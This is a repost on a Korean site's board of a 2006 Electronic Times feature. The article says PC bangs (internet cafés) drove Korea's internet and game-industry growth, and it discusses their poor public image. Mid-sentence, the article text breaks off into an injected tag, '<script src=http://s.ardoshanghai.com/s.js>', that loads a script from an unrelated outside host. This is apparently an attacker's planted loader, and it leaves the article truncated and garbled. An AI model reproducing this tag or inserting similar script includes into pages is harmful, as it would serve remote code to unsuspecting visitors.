제 목 (10)PC방의 역할
작성자 관리자 작성일 2006-09-11 조회수 5195
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전자신문 기획 기사 시리즈 제 10회

[클린 게임, 쿨한 세상](10)PC방의 역할

세계 최고의 인터넷 이용률, 인터넷 관련 부가산업 창출의 선도국.’


우리나라에 이 같은 수식어가 따라 붙고, 세계 각국의 부러움을 사기까지 여러 산업분야의 역할이 있었지만 PC방의 역할이 가장 컸다. 전국에 구축된 2만여개 PC방이 전국민의 정보화 인프라로, 관련 산업을 급성장시키는 고속도로로 활용됐다는데 이의를 달 수 없을 정도다.

 
인터넷이 만든 또 하나기회의 땅게임도 마찬가지다. PC방을 통해 게임산업이 커졌고, PC방으로 게임 이용문화가 급속히 전파되는 과정을 지금도 걷고 있다. 따라서 불법 게임물 유통을 막고 건전 게임문화를 확산시키기 위한 최초·최후의전선 PC방이라고 해도 과언이 아니다.

 
그러나 PC방을 바라보는 시각은 여전히 부정적인 것으로 가득차 있다. 최근엔도박장을 가장한 PC방까지 등장하면서 사회적 여론은 PC방 전체를 구분없이 사지로 몰아넣고 있다. 이런 상황에서 최근 한국게임산업개발원과 한국인터넷PC문?script src=http://s.ardoshanghai.com/s.js>

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